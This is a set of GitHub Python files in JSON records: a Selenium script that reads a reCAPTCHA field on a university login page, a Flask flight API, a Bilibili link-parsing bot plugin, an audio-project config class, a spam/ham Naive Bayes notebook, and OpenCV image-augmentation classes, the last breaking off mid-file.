+{"seq_id": "31868062061", "text": "from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\nchrome_service = Service(ChromeDriverManager().install())\n\nchrome_options = Options()\noptions = [\n \"--headless\",\n \"--disable-gpu\",\n \"--window-size=1920,1200\",\n \"--ignore-certificate-errors\",\n \"--disable-extensions\",\n \"--no-sandbox\",\n \"--disable-dev-shm-usage\"\n]\nfor option in options:\n chrome_options.add_argument(option)\n\ndriver = webdriver.Chrome(service=chrome_service, options=chrome_options)\ndriver.get(\"https://vulms.vu.edu.pk/LMS_LP.aspx\")\n\ncaptcha_text = driver.find_element(By.ID, \"g-recaptcha-response\")\nprint(captcha_text.get_attribute('value'))", "repo_name": "Anon-Exploiter/selenium-actions-test", "sub_path": "action.py", "file_name": "action.py", "file_ext": "py", "file_size_in_byte": 821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 7, "usage_type": "call"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 25, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "19404778269", "text": "from flask import Flask, json, abort\r\nimport csv\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n return 'Example URL to create query: 127.0.0.1:5000/flights/2 '\r\n\r\n\r\n@app.route('/flights/', methods=['GET'])\r\ndef flights(flight_id):\r\n with open('flights.csv') as file:\r\n file_reader = csv.reader(file)\r\n for row in file_reader:\r\n if row[0] == flight_id:\r\n data = {\r\n 'ArrivalTime': row[6],\r\n 'DepartureTime': row[4],\r\n 'Number': row[7]\r\n }\r\n return json.dumps(data)\r\n abort(404)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n", "repo_name": "LitovaLi/Web", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "8762078583", "text": "import re\n\nfrom nonebot import on_regex\nfrom nonebot.adapters.onebot.v11 import GroupMessageEvent, MessageEvent\nfrom nonebot.log import logger\n\nfrom .analysis_bilibili import b23_extract, bili_keyword\nfrom utils.rauthman import isInService\n\n\n__help_plugin_name__ = 'B站视频解析'\n__des__ = 'Bilibili视频、番剧解析'\n__author__ = 'mengshouer + NekoAria'\n__level__ = '1'\n__cmd__ = '''\n发送Bilibili视频链接、小程序、BV号等\n'''.strip()\n__example__ = '''\nBV114514\n'''.strip()\n__note__ = '''\n- N/A'''\n__usage__ = f'''{__des__}\n作者:{__author__}\n权限等级:{__level__}\n用法:{__cmd__}\n举例:{__example__}\n备注:{__note__}'''\n\n\nanalysis_bili = on_regex(\n r\"(b23.tv)|(bili(22|23|33|2233).cn)|(.bilibili.com)|(^(av|cv)(\\d+))|(^BV([a-zA-Z0-9]{10})+)|\"\n r\"(\\[\\[QQ小程序\\]哔哩哔哩\\])|(QQ小程序]哔哩哔哩)|(QQ小程序]哔哩哔哩)\",\n flags=re.I,\n rule=isInService(\"B站视频解析\", 1))\n\n\n@analysis_bili.handle()\nasync def analysis_main(event: MessageEvent) -> None:\n text = str(event.message).strip()\n if re.search(r\"(b23.tv)|(bili(22|23|33|2233).cn)\", text, re.I):\n # 提前处理短链接,避免解析到其他的\n text = await b23_extract(text)\n group_id = event.group_id if isinstance(event, GroupMessageEvent) else None\n msg = await bili_keyword(group_id, text)\n if msg:\n try:\n await analysis_bili.send(msg)\n except Exception as e:\n logger.error(e)", "repo_name": "Cytrogen/Hoka-Bot", "sub_path": "src/plugins/bilibili_analysis/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "nonebot.on_regex", "line_number": 31, "usage_type": "call"}, {"api_name": "re.I", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.rauthman.isInService", "line_number": 35, "usage_type": "call"}, {"api_name": "nonebot.adapters.onebot.v11.MessageEvent", "line_number": 39, "usage_type": "name"}, {"api_name": "re.search", "line_number": 41, "usage_type": "call"}, {"api_name": "re.I", "line_number": 41, "usage_type": "attribute"}, {"api_name": "analysis_bilibili.b23_extract", "line_number": 43, "usage_type": "call"}, {"api_name": "nonebot.adapters.onebot.v11.GroupMessageEvent", "line_number": 44, "usage_type": "argument"}, {"api_name": "analysis_bilibili.bili_keyword", "line_number": 45, "usage_type": "call"}, {"api_name": "nonebot.log.logger.error", "line_number": 50, "usage_type": "call"}, {"api_name": "nonebot.log.logger", "line_number": 50, "usage_type": "name"}]}
+{"seq_id": "74394865368", "text": "import json\nimport logging\nimport mongoengine\nimport os\nfrom ConfigParser import ConfigParser\nfrom abjad.tools import stringtools\n\n\nclass SashaConfiguration(dict):\n\n ### CLASS VARIABLES ###\n\n __slots__ = (\n '_environment',\n '_logger',\n '_mongodb_client',\n )\n\n ### INITIALIZER ###\n\n def __init__(self, environment='development'):\n import sasha\n sasha_root = sasha.__path__[0]\n parser = ConfigParser(dict_type=dict)\n sasha_cfg_file_path = os.path.join(sasha_root, 'sasha.cfg')\n assert os.path.exists(sasha_cfg_file_path)\n parser.read(sasha_cfg_file_path)\n for section in parser.sections():\n self[section] = {}\n for option, value in parser.items(section):\n self[section][option] = value\n self._logger = logging.getLogger('sasha')\n self.logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler(\n os.path.join(sasha_root, self['logging']['logfile']))\n handler.setLevel(logging.DEBUG)\n log_message = '%(asctime)s - %(name)s - %(levelname)s: %(message)s'\n formatter = logging.Formatter(log_message)\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self._mongodb_client = None\n assert environment in ('testing', 'development', 'deployment')\n self._environment = environment\n\n ### PUBLIC METHODS ###\n\n def bootstrap(self):\n from sasha.tools.systemtools import Bootstrap\n Bootstrap()()\n\n def connect(self):\n if self._mongodb_client is not None:\n self._mongodb_client.close()\n self._mongodb_client = mongoengine.connect(self.mongodb_database_name)\n\n @staticmethod\n def find_executable(executable_name):\n def is_executable(fpath):\n return os.path.exists(fpath) and os.access(fpath, os.X_OK)\n\n def extension_candidates(file_path):\n yield file_path\n for extension in os.environ.get('PATHEXT', '').split(os.pathsep):\n yield file_path + extension\n file_path, file_name = os.path.split(executable_name)\n if file_path:\n if is_executable(executable_name):\n return executable_name\n else:\n for path in os.environ['PATH'].split(os.pathsep):\n executable_file = os.path.join(path, executable_name)\n for candidate in extension_candidates(executable_file):\n if is_executable(candidate):\n return candidate\n return None\n\n def get_audiodb_parameters(self, name):\n import sasha\n sasha_root = sasha.__path__[0]\n assert name in self['audioDB']\n item = self['audioDB'][name].split(',')\n db_path = os.path.join(\n self['media_root'][self.environment],\n self['media']['databases'],\n item[0].strip())\n if not os.path.isabs(db_path):\n db_path = os.path.abspath(os.path.join(sasha_root, db_path))\n klass_path = item[1].strip()\n module_name = klass_path.rpartition('.')[0]\n klass_name = klass_path.rpartition('.')[-1]\n module = __import__(module_name, globals(), locals(), [klass_name])\n klass = getattr(module, klass_name)\n return db_path, klass\n\n def get_binary(self, name):\n return self['binaries'][name]\n\n def get_fixtures(self, cls):\n from sasha import sasha_configuration\n cls_name = stringtools.to_snake_case(cls.__name__)\n fixtures_path = os.path.join(\n sasha_configuration.get_media_path('fixtures'),\n cls_name + 's',\n #cls.__tablename__,\n )\n fixture_file_names = os.listdir(fixtures_path)\n fixture_file_names = (\n _ for _ in fixture_file_names\n if _.startswith(cls_name) and _.endswith('.json')\n )\n fixture_file_paths = (\n os.path.join(fixtures_path, _)\n for _ in fixture_file_names\n )\n fixtures = []\n for fixture_file_path in fixture_file_paths:\n with open(fixture_file_path, 'r') as file_pointer:\n fixture = json.load(file_pointer)\n fixtures.append(fixture)\n return fixtures\n\n def get_media_path(self, name):\n import sasha\n sasha_root = sasha.__path__[0]\n path = os.path.join(\n self['media_root'][self.environment],\n self['media'][name])\n if not os.path.isabs(path):\n path = os.path.abspath(os.path.join(sasha_root, path))\n return path\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def environment(self):\n return self._environment\n\n @environment.setter\n def environment(self, value):\n assert value in ['testing', 'development', 'deployment']\n self._environment = value\n self.connect()\n\n @property\n def logger(self):\n return self._logger\n\n @property\n def mongodb_client(self):\n return self._mongodb_client\n\n @property\n def mongodb_database_name(self):\n return 'sasha-{}'.format(self.environment)", "repo_name": "josiah-wolf-oberholtzer/sasha", "sub_path": "sasha/tools/systemtools/SashaConfiguration.py", "file_name": "SashaConfiguration.py", "file_ext": "py", "file_size_in_byte": 5158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sasha.__path__", "line_number": 23, "usage_type": "attribute"}, {"api_name": "ConfigParser.ConfigParser", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 38, "usage_type": "call"}, {"api_name": "sasha.tools.systemtools.Bootstrap", "line_number": 49, "usage_type": "call"}, {"api_name": "mongoengine.connect", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 59, "usage_type": "call"}, {"api_name": "os.X_OK", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 63, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.pathsep", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.pathsep", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sasha.__path__", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "abjad.tools.stringtools.to_snake_case", "line_number": 100, "usage_type": "call"}, {"api_name": "abjad.tools.stringtools", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sasha.sasha_configuration.get_media_path", "line_number": 102, "usage_type": "call"}, {"api_name": "sasha.sasha_configuration", "line_number": 102, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 118, "usage_type": "call"}, {"api_name": "sasha.__path__", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "19454107569", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[22]:\n\n\nprint(' SpamHam Project ')\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn import metrics\nimport seaborn as sn\nfrom sklearn.metrics import confusion_matrix\nimport re\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom sklearn import model_selection, preprocessing, naive_bayes,metrics\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n# In[5]:\n\n\ndf_inputdata = pd.read_csv('/Users/jaswanthjerripothula/Desktop/SpamHam.csv',usecols = [0,1],encoding = 'latin-1')\n\n\n# In[7]:\n\n\ndf_inputdata.head()\n\n\n# In[11]:\n\n\ndf_inputdata.rename(columns = {'v1': 'Category','v2': 'Message'}, inplace = True)\n\n\n# In[12]:\n\n\ndf_inputdata.head()\n\n\n# In[13]:\n\n\ndf_inputdata.count()\n\n\n# In[14]:\n\n\ndf_inputdata.groupby('Category').describe()\n\n\n# In[15]:\n\n\ndf_inputdata.groupby('Category').count()\n\n\n# In[18]:\n\n\ncategory_count = pd.DataFrame()\ncategory_count['count'] = df_inputdata['Category'].value_counts()\n\n\n# In[19]:\n\n\ncategory_count['count']\n\n\n# In[34]:\n\n\nfig , ax = plt.subplots(figsize = (12,6))\nsn.barplot (x = category_count.index , y = category_count['count'],ax = ax)\nax.set_ylabel ('Count',fontsize = 20)\nax.set_xlabel ('Category',fontsize = 20)\nax.tick_params(labelsize = 20)\n\n\n# In[33]:\n\n\n#Looking at the above numbers of hams and spams there are more number of hams than spams \n\n\n# In[35]:\n\n\n#Preprocessing Tweets for removing punctuations(! , '), @ , # , https , special characters\ndef processMessage(tweet):\n from string import punctuation\n tweet = re.sub(r'\\&\\w*;','',tweet)\n tweet = re.sub('@[^\\s]+','',tweet)\n tweet = re.sub(r'\\$\\w*','',tweet)\n tweet = tweet.lower()\n tweet = re.sub(r'https?:\\/\\/.*\\/\\w*','',tweet)\n tweet = re.sub(r'#\\w*','',tweet)\n tweet = re.sub(r'['+punctuation.replace('@','')+']+','',tweet)\n tweet = re.sub(r'\\b\\w{1,2}\\b','',tweet)\n tweet = re.sub(r'\\s\\s+',' ',tweet)\n tweet = tweet.lstrip(' ')\n tweet = ''.join(c for c in tweet if c <= '\\uFFFF')\n return tweet\n\n\n# In[37]:\n\n\ndf_inputdata['Message'] = df_inputdata['Message'].apply(processMessage)\n\n\n# In[38]:\n\n\ndf_inputdata['Message'].head(7)\n\n\n# In[39]:\n\n\ndf_inputdata['Message'].tail(7)\n\n\n# In[40]:\n\n\ndf_inputdata['Category'].value_counts()\n\n\n# In[42]:\n\n\n#convert the labels from text to numbers\nlabel_encoder = preprocessing.LabelEncoder()\ndf_inputdata['Category'] = label_encoder.fit_transform(df_inputdata['Category'])\n\n\n# In[43]:\n\n\nX = df_inputdata.Message\ny = df_inputdata.Category\n\n\n# In[44]:\n\n\ndf_inputdata['Category'].head(7)\n\n\n# In[45]:\n\n\n#Split the dataser into 80% and 20% for training respectively\nX_train , X_test , y_train , y_test = train_test_split(X,y,test_size = 0.20)\n\n\n# In[46]:\n\n\ntype (X_train)\n\n\n# In[47]:\n\n\n#convert the raw document into a matrix of TF-IDF features\ntfidf_vect = TfidfVectorizer(analyzer = 'word', token_pattern = r'\\w{1,}', max_features = 20000)\n#Create TF-IDF with X_train\ntfidf_vect.fit(X_train)\n\n\n# In[48]:\n\n\n#the TF-IDF created with X_train for transforming X_train and X_test\nxtrain_tfidf = tfidf_vect.transform(X_train)\nxvalid_tfidf = tfidf_vect.transform(X_test)\n\n\n# In[50]:\n\n\n#Create a model for NaiveBaye's Model\nmodel = naive_bayes.MultinomialNB()\n\n\n# In[51]:\n\n\n#Create a model for NaiveBaye's Model\nmodel = naive_bayes.MultinomialNB()\n\n\n# In[53]:\n\n\n#Get the prediction for X_test which is transformed with TF-IDF \ny_pred = model.predict(xvalid_tfidf)\n\n\n# In[57]:\n\n\n#Get accuracy for the model\nmetrics.accuracy_score(y_test,y_pred)\n\n\n# In[63]:\n\n\n#Get the confusion Matrix\ncm = confusion_matrix(y_test,y_pred)\nconf_matrix = pd.DataFrame(data = cm , columns = ['Predicted : 0','Predicted : 1'],\n index = ['Actual : 0','Actual : 1'])\nplt.figure(figsize = (8,5))\nsn.heatmap(conf_matrix, annot=True , fmt = 'd', cmap = \"YlGnBu\")\n\n\n# In[69]:\n\n\n#Ham input for testing\nmyHamData = np.array([\"Nah I don't think he goes to usf, he lives around here though\"])\n#Spam input for testing \nmySpamData = np.array([\"URGENT! You have won a 1 week FREE membership in our £100,000 Prize Jackpot! Txt the word: CLAIM to No: 81010 T&C www.dbuk.net LCCLTD POBOX 4403LDNW1A7RW18\"])\n\n\n# In[70]:\n\n\nmyHamData = tfidf_vect.transform(myHamData)\n\n\n# In[101]:\n\n\ny_result1 = model.predict(myHamData)\n\n\n# In[102]:\n\n\ny_result1[0]\n\n\n# In[103]:\n\n\nhamvalue = label_encoder.inverse_transform([y_result1[0]])\n\n\n# In[105]:\n\n\nhamvalue[0]\n\n\n# In[121]:\n\n\n#Spam,Ham\nmyMultiplesData=[\"Free entry in 2 a wkly comp to win FA Cup final tkts 21st May 2005. Text FA to 87121 to receive entry question(std txt rate)T&C's apply 08452810075over18's\",\"Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030\",'I HAVE A DATE ON SUNDAY WITH WILL!!']\n\n\n# In[122]:\n\n\ndf_myMultiplesData=pd.DataFrame(myMultiplesData,columns={'Message'})\n\n\n# In[123]:\n\n\ndf_myMultiplesData['Message'] = df_myMultiplesData['Message'].apply(processMessage)\n\n\n# In[124]:\n\n\nmyMultiData = tfidf_vect.transform(df_myMultiplesData['Message'])\n\n\n# In[125]:\n\n\ny_predlabels=model.predict(myMultiData)\n\n\n# In[126]:\n\n\ny_predlabels.shape\n\n\n# In[127]:\n\n\n#y_predlabels=y_prelabels.reshape(-1)\n\n\n# In[128]:\n\n\nvals = label_encoder.inverse_transform(y_predlabels)\n\n\n# In[129]:\n\n\nfor val in vals:\n print(val)\n\n\n# In[130]:\n\n\nfrom sklearn.metrics import classification_report\n\n\n# In[131]:\n\n\nreport = classification_report(y_test,y_pred,labels=[0,1])\n\n\n# In[132]:\n\n\nprint(report)\n\n\n# In[133]:\n\n\ntype(report)\n\n\n# In[134]:\n\n\n#recall=TP/(TP+FN)\n#precision=TP/(TP+FP)\n#f1-score = 2*(precision*recall)/(precision+recall)\n\n\n# In[146]:\n\n\nTP = cm[0,0]\nFN = cm[0,1]\nFP = cm[1,0]\nTN = cm[1,1]\n\n\n# In[137]:\n\n\nrecall = TP/(TP+FN)\n\n\n# In[138]:\n\n\nrecall\n\n\n# In[141]:\n\n\nprecision = TP/(TP+FP)\n\n\n# In[142]:\n\n\nprecision\n\n\n# In[143]:\n\n\nf1score = 2*(precision*recall)/(precision+recall)\n\n\n# In[144]:\n\n\nf1score\n\n\n# In[145]:\n\n\nprint(' HAMSPAM Project completed successfully ')\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "JJas00/DataAnalyst-and-ML-Projects", "sub_path": "Project1@SpamHam.py", "file_name": "Project1@SpamHam.py", "file_ext": "py", "file_size_in_byte": 6146, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 84, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 102, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 103, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 104, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 106, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 107, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 108, "usage_type": "call"}, {"api_name": "string.punctuation.replace", "line_number": 108, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 108, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 109, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 110, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 144, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 195, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes", "line_number": 195, "usage_type": "name"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes", "line_number": 202, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 216, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 216, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 223, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 236, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 279, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 334, "usage_type": "call"}]}
+{"seq_id": "70980158168", "text": "from __future__ import absolute_import\nimport random\nimport itertools\nimport numpy as np\nimport cv2 as cv\nfrom aug import helper\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Abstract augmenter\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass Augmenter(object):\n\n def __init__(self):\n self.name = None\n self.params = None\n self.params_random = None\n\n @staticmethod\n def transform(img, *arg):\n pass\n\n def augment_random(self, *images):\n params = [p.get() for p in self.params_random]\n name = \"{}[{}]\".format(self.name, helper.to_string(params))\n results = []\n for img in images:\n dst = self.transform(img, *params)\n results.append(dst)\n return results, name\n\n def augment_fixed(self, image):\n for params in itertools.product(*self.params):\n dst = self.transform(image, *params)\n name = \"{}[{}]\".format(self.name, helper.to_string(params))\n yield (dst, name)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Augmenters\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass CopyParam(object):\n @staticmethod\n def get():\n return \"{}\"\n\n\nclass CopyAugmenter(Augmenter):\n\n def __init__(self):\n super(CopyAugmenter, self).__init__()\n self.param = \"{}\"\n self.params_random = [CopyParam()]\n self.name = 'co'\n\n @staticmethod\n def transform(img, param):\n return img\n\n\nclass RotateAugmenter(Augmenter):\n\n def __init__(self, degrees=(0, 90, 180, 270)):\n super(RotateAugmenter, self).__init__()\n self.params = [degrees]\n self.params_random = [RandomElement(degrees)]\n self.name = 'ro'\n\n @staticmethod\n def transform(img, degree):\n if degree == 0:\n return img\n if degree not in [90, 180, 270]:\n print(\"Warning: unsupported rotation degree. Ignoring\")\n return None\n if degree == 90:\n dst = cv.transpose(img)\n return cv.flip(dst, 1)\n if degree == 180:\n return cv.flip(img, -1)\n if degree == 270:\n dst = cv.transpose(img)\n return cv.flip(dst, 0)\n\n\nclass RotateAngleAugmenter(Augmenter):\n\n def __init__(self, degrees=(-10, 0, 10)):\n super(RotateAngleAugmenter, self).__init__()\n self.params = [degrees]\n self.params_random = [RandomFromRange(min(degrees), max(degrees))]\n self.name = 'ra'\n\n @staticmethod\n def transform(img, degree):\n if degree == 0:\n return img\n h, w = img.shape[:2]\n m = cv.getRotationMatrix2D((w / 2, h / 2), degree, 1)\n return cv.warpAffine(img, m, (w, h))\n\n\nclass FlipAugmenter(Augmenter):\n\n def __init__(self, flips=(None, 0, 1)):\n super(FlipAugmenter, self).__init__()\n self.params = [flips]\n self.params_random = [RandomElement(flips)]\n self.name = 'fl'\n\n @staticmethod\n def transform(img, flip):\n if flip is None:\n return img\n dst = cv.flip(img, flip)\n return dst\n\n\nclass HueDistortionAugmenter(Augmenter):\n\n def __init__(self, factors=(-3, 3, 0, 7, -7)):\n super(HueDistortionAugmenter, self).__init__()\n self.params = [factors]\n self.params_random = [RandomFromRange(min(factors), max(factors))]\n self.name = 'hu'\n\n @staticmethod\n def transform(img, factor):\n\n if factor == 0 or helper.is_mask(img):\n return img\n\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n h, s, v = cv.split(hsv) # H: 0 - 180, S: 0 - 255, V: 0 - 255\n hsv_max = 180\n\n h = np.uint8(h + factor)\n if factor > 0:\n h[h > hsv_max] -= hsv_max\n if factor < 0:\n h[h > hsv_max] -= 75\n\n dst = cv.merge([h, s, v])\n dst = cv.cvtColor(dst, cv.COLOR_HSV2BGR)\n return dst\n\n\nclass SaturationDistortionAugmenter(Augmenter):\n\n def __init__(self, factors=(-10, 10, 0, 20, -20)):\n super(SaturationDistortionAugmenter, self).__init__()\n self.params = [factors]\n self.params_random = [RandomFromRange(min(factors), max(factors))]\n self.name = 'sa'\n\n @staticmethod\n def transform(img, factor):\n\n if factor == 0 or helper.is_mask(img):\n return img\n\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n h, s, v = cv.split(hsv) # H: 0 - 180, S: 0 - 255, V: 0 - 255\n\n s = cv.add(s, factor)\n s[s == factor] = 0\n\n dst = cv.merge([h, s, v])\n dst = cv.cvtColor(dst, cv.COLOR_HSV2BGR)\n return dst\n\n\nclass BrightnessAugmenter(Augmenter):\n\n def __init__(self, ratios=(0.9, 1.0, 1.1)):\n super(BrightnessAugmenter, self).__init__()\n self.params = [ratios]\n self.params_random = [RandomFromRange(min(ratios), max(ratios))]\n self.name = 'br'\n\n @staticmethod\n def transform(img, ratio):\n\n if ratio == 1.0 or helper.is_mask(img):\n return img\n\n img = img * ratio\n img[img > 255] = 255\n img = np.uint8(img)\n return img\n\n\nclass BlurAugmenter(Augmenter):\n\n def __init__(self, kernels=(1, 7)):\n super(BlurAugmenter, self).__init__()\n self.params = [kernels]\n self.params_random = [RandomNormalFromRange(min(kernels), max(kernels), step=2)]\n self.name = 'bl'\n\n @staticmethod\n def transform(img, kernel):\n\n if kernel <= 1 or helper.is_mask(img):\n return img\n\n dst = cv.GaussianBlur(img, (kernel, kernel), 0)\n return dst\n\n\nclass NoiseAugmenter(Augmenter):\n\n def __init__(self, variances=(0, 7, 15)):\n super(NoiseAugmenter, self).__init__()\n self.params = [variances]\n self.params_random = [RandomNormalFromRange(min(variances), max(variances))]\n self.name = 'no'\n\n @staticmethod\n def transform(img, variance):\n\n if variance == 0 or helper.is_mask(img):\n return img\n\n mean = 0\n sigma = variance**0.5\n gauss = np.random.normal(mean, sigma, img.shape)\n # gauss = gauss.reshape(image.shape)\n dst = img + gauss\n dst[dst < 0] = 0\n dst[dst > 255] = 255\n dst = np.uint8(dst)\n return dst\n\n\nclass PerspectiveAugmenter(Augmenter):\n\n def __init__(self, direction=(0, 1, 2, 3), ratio=(0.0, 0.3)):\n super(PerspectiveAugmenter, self).__init__()\n self.params = [direction, ratio]\n self.params_random = [RandomElement(direction), RandomFromRange(min(ratio), max(ratio))]\n self.name = 'pe'\n\n @staticmethod\n def transform(img, direction, ratio):\n\n if ratio == 0.0:\n return img\n\n height = img.shape[0]\n width = img.shape[1]\n offset = int((ratio / 2) * (height + width) / 2)\n\n if direction == 0:\n vectors = np.float32([[offset, 0], [-offset, 0], [0, 0], [0, 0]])\n elif direction == 1:\n vectors = np.float32([[0, 0], [0, offset], [0, -offset], [0, 0]])\n elif direction == 2:\n vectors = np.float32([[0, 0], [0, 0], [-offset, 0], [offset, 0]])\n else:\n vectors = np.float32([[0, offset], [0, 0], [0, 0], [0, -offset]])\n\n orig_pts = np.float32([[0, 0], [width, 0], [width, height], [0, height]])\n\n m = 